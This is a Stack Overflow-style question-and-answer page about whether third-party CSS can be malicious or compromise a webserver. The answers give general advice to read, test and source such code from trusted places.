Is it dangerous to use third party CSS?

Question

I found a some MIT-licensed CSS I would like to use for my web app. I've been reading that malicious css can be injected into websites (source: Can Malicious Code Be Executed From A CSS File?) to launch a cross-site-scripting type of attack.

Here's my question: I'm wondering if it is possible for malicious css to infect my webserver with malware, and if so, what would be the tell-tale signs of malice in that kind of css that I should look out for?

It won't infect your webserver unless you fire requests from within your machine against itself. Malicious CSS may infect visitors. — m02ph3u5, Jul 19 '19 at 15:07
*I found a nice-looking css loader on the Internet that I would like to use.* --> study the code, understand it and reproduce the same --> 0 risk — Temani Afif, Jul 19 '19 at 15:08
@m02ph3u5 that's what I figured. can you provide an example of an instance in which I would be firing requests to my website within the web server? — ElsaInSpirit, Jul 19 '19 at 15:12
Just make sure to read the css code before using it, if you see something you don't understand then dont use it and you should be fine — ahzep, Jul 19 '19 at 15:24

pegasuspect · Accepted Answer · 2019-07-19T15:15:31.720

1

Short answer: Yes.

Long answer: You should always read and own the code you are copy-pasting. It’s also a good clean code practice to fix “smelly” code. You should check for any links and suspicious css. Do not just publish a code before testing it yourself; ie. visiting the pages yourself like a user/visitor of the website. This way you can be sure to avoid any malicious css code.

edited Jul 19 '19 at 15:15

answered Jul 19 '19 at 15:12

pegasuspect

991
4
15

From reading your answer it sounds like the malicious code could compromise my webpage. But could it compromise the webserver itself? And how? – ElsaInSpirit Jul 19 '19 at 15:14
I never tried to compromise a webserver by writing css before :) so I can’t give you an example even if there is one. The only thing is css is not very complicated and if you have to copy paste very long codes like css libraries, do it from the sources you trust. There are a couple of examples on the link you shared. They are nice, and quite obvious to the eye. – pegasuspect Jul 19 '19 at 15:19
it would be a problem for the visitor. not the server because the image is downloaded into the client browser not in the server. – pegasuspect Jul 19 '19 at 15:25
although the limitations and permissions of the file downloaded by the browser probably wouldn’t let the python file to execute. – pegasuspect Jul 19 '19 at 15:27
The most extreme way I can fantasize would be to find a way to embed a malicious script in an image and to trigger the browser to run that script by showing the image. That, of course requires knowledge of huge security leaks for the browser and know-how of the whole process which I can only fantasize :) – pegasuspect Jul 19 '19 at 15:31

Is it dangerous to use third party CSS?

1 Answers1